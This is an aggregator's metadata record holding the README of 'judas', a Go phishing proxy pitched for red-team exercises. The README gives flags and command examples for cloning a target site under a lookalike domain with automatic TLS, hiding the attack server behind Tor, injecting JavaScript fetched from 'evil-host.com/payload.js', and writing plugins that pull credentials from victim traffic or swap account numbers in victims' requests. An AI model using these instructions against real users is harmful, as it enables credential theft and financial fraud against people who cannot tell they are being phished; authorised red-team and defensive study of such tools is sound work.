{"id":13539479,"url":"https://github.com/joncooperworks/judas","last_synced_at":"2026-01-17T08:44:19.739Z","repository":{"id":52719648,"uuid":"122701195","full_name":"JonCooperWorks/judas","owner":"JonCooperWorks","description":null,"archived":false,"fork":false,"pushed_at":"2021-04-20T09:25:27.000Z","size":73,"stargazers_count":274,"open_issues_count":2,"forks_count":71,"subscribers_count":16,"default_branch":"master","last_synced_at":"2024-11-03T04:32:37.237Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JonCooperWorks.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-02-24T03:54:45.000Z","updated_at":"2024-09-18T03:25:56.000Z","dependencies_parsed_at":"2022-09-26T18:31:05.537Z","dependency_job_id":null,"html_url":"https://github.com/JonCooperWorks/judas","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JonCooperWorks%2Fjudas","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JonCooperWorks%2Fjudas/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JonCooperWorks%2Fjudas/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JonCooperWorks%2Fjudas/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JonCooperWorks","download_url":"https://codeload.github.com/JonCooperWorks/judas/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767727,"owners_count":20830544,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:26.475Z","updated_at":"2026-01-17T08:44:19.708Z","avatar_url":"https://github.com/JonCooperWorks.png","language":"Go","funding_links":[],"categories":["\u003ca id=\"1a9934198e37d6d06b881705b863afc8\"\u003e\u003c/a\u003e通信\u0026\u0026代理\u0026\u0026反向代理\u0026\u0026隧道","\u003ca id=\"d03d494700077f6a65092985c06bf8e8\"\u003e\u003c/a\u003e工具","\u003ca id=\"3e622bff3199cf22fe89db026b765cd4\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"56acb7c49c828d4715dce57410d490d1\"\u003e\u003c/a\u003e未分类-Proxy","\u003ca id=\"0ff94312f3ab4898f5996725133ea9d1\"\u003e\u003c/a\u003e未分类","\u003ca id=\"290e9ae48108d21d6d8b9ea9e74d077d\"\u003e\u003c/a\u003e钓鱼\u0026\u0026Phish"],"readme":"Judas\n=====\nJudas is a pluggable phishing proxy.\nIt can clone any website passed to it using command line flags, and you can extend it with Go plugins for fun and (legal) profit.\nJudas is meant to be used in red team phishing exercises to phish victims without them being able to notice.\nWhen combined with effective typosquatting, Judas is unstoppable.\n\n```\nUsage of judas:\n  -address string\n        Address and port to run proxy service on. Format address:port. (default \"localhost:8080\")\n  -inject-js string\n        URL to a JavaScript file you want injected.\n  -insecure\n        Listen without TLS.\n  -insecure-target\n        Not verify SSL certificate from target host.\n  -plugins string\n        Colon separated file path to plugin binaries.\n  -proxy string\n        Optional upstream proxy. Useful for torification or debugging. Supports HTTPS and SOCKS5 based on the URL. For example, http://localhost:8080 or socks5://localhost:9150.\n  -proxy-ca-cert string\n        Proxy CA cert for signed requests\n  -ssl-hostname string\n        Hostname for SSL certificate\n  -target string\n        The website we want to phish.\n  -with-profiler\n        Attach profiler to instance.\n```\n\nBuilding\n--------\nTo build `judas`, simply run `go build`.\n ```\n go build cmd/judas.go\n ```\n\n\nUsage\n-----\nThe target ```--target``` flag is required.\n`judas` will use Let's Encrypt to automatically create SSL certificates for website, simply pass the `--ssl-hostname` flag.\n\nExample:\n```\n./judas \\\n    --target https://target-url.com \\\n    --ssl-hostname phishingsite.com\n```\n\nIf you want to listen using HTTP, pass the ```--insecure``` flag.\n\nExample:\n```\n./judas \\\n    --target https://target-url.com \\\n    --insecure\n```\n\nIf you want to accept self-signed SSL certificate from target host, pass the ```--insecure-target``` flag.\nThis is useful for passing it through an intercepting proxy like Burp Suite for debugging purposes.\n\nExample:\n```\n./judas \\\n    --target https://target-url-with-self-signed-cert.com \\\n    --proxy http://localhost:8080 \\\n    --insecure-target\n```\n\n\nIt can optionally use an upstream proxy with the ```--proxy``` argument to proxy Tor websites or hide the attack server from the target.\nJudas supports SOCKS5 and HTTP proxies.\nHTTP proxies must being with `http://` and socks5 proxies must begin with `socks5://`\n\nExample:\n```\n./judas \\\n    --target https://torwebsite.onion \\\n    --ssl-hostname phishingsite.com \\\n    --proxy socks5://localhost:9150\n```\n\nBy default, Judas listens on localhost:8080.\nTo change this, use the ```--address``` argument.\n\nExample:\n```\n./judas \\\n    --target https://target-url.com \\\n    --ssl-hostname phishingsite.com \\\n    --address=0.0.0.0:8080\n```\n\nJudas can also inject custom JavaScript into requests by passing a URL to a JS file with the ```--inject-js``` argument.\n\nExample:\n```\n./judas \\\n    --target https://target-url.com \\\n    --ssl-hostname phishingsite.com \\\n    --inject-js https://evil-host.com/payload.js\n```\n\nPlugins\n-------\nJudas can be extended using [Go plugins](https://golang.org/pkg/plugin/). \nAn `judas` plugin is a regular Go plugin with a function called `New` that implements `judas.InitializerFunc`.\nYou can use plugins to save request-response transactions to disk for further analysis, or pull credentials and sensitive information out of requests and responses on the fly.\nPlugins run in their own goroutine and judas will recover from panics, so you don't need to worry too much about what you do in the plugins.\nYou should configure your plugins using [environment variables](https://golang.org/pkg/os/#Getenv).\n\n```\n// InitializerFunc is a go function that should be exported by a function package.\n// It should be named \"New\".\n// Your InitializerFunc should return an instance of your Listener with a reference to judas's logger for consistent logging.\ntype InitializerFunc func(*log.Logger) (Listener, error)\n```\n\nThe `judas.Listener` interface has one method: `Listen`.\n\n```\n// Listener implementations will be given a stream of HTTPExchanges to let plugins capture valuable information out of request-response transactions.\ntype Listener interface {\n\tListen(\u003c-chan *HTTPExchange)\n}\n```\n\n`Listen` implementations will receive a stream of  `judas.HTTPExchange`.\nThese contain the `judas.Request`, the payload and the `judas.Response`, along with the target.\n\n```\n// HTTPExchange contains the request sent by the user to us and the response received from the target server.\n// Listeners can use this struct to pull information out of requests and responses.\ntype HTTPExchange struct {\n\tRequest  *Request\n\tResponse *Response\n\tTarget   *url.URL\n}\n```\n\nPlugins can also modify requests after they come from the victim and responses after they're returned from the server.\nThis is useful when you want to modify a request on the fly, like replacing an account number with yours.\nTo take advantage of this, simply create a custom `RequestTransformer` or `ResponseTransformer`.\n\n```\n// RequestTransformer modifies a request before it is sent to the target website.\n// This can be used to hijack victim actions, like replacing an account number with ours.\n// Delays in this function will slow down the phishing site for the victim.\n// Your RequestTransformer should be a function called \"RequestTransformer\"\ntype RequestTransformer func(*http.Request) error\n\n// ResponseTransformer modifies a response before it is returned to the victim.\n// You can use ResponseTransformers to hide any visible results of a RequestTransformer.\n// Delays in this function will slow down the phishing site for the victim.\n// Your ResponseTransformer should be a function called \"ResponseTransformer\"\ntype ResponseTransformer func(*http.Response) error\n```\n\nYou only have to implement the methods you're using.\nYou can put compiled plugins in a directory and pass them with the `--plugins` flag.\nPlugins are colon separated file paths.\n\nExample:\n```\njudas \\\n     --target https://www.target.com \\\n     --insecure \\\n     --address localhost:9000 \\\n     --proxy http://localhost:8080 \\\n     --insecure-target \\\n     --plugins ./searchloggingplugin.so:./linksloggingplugin.so\n```\n\nSee [examples/searchloggingplugin/searchloggingplugin.go](https://github.com/JonCooperWorks/judas/tree/master/examples/searchloggingplugin/searchloggingplugin.go)\n\nYou can build a plugin using this command:\n```\ngo build -buildmode=plugin examples/searchloggingplugin/searchloggingplugin.go\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoncooperworks%2Fjudas","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjoncooperworks%2Fjudas","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoncooperworks%2Fjudas/lists"}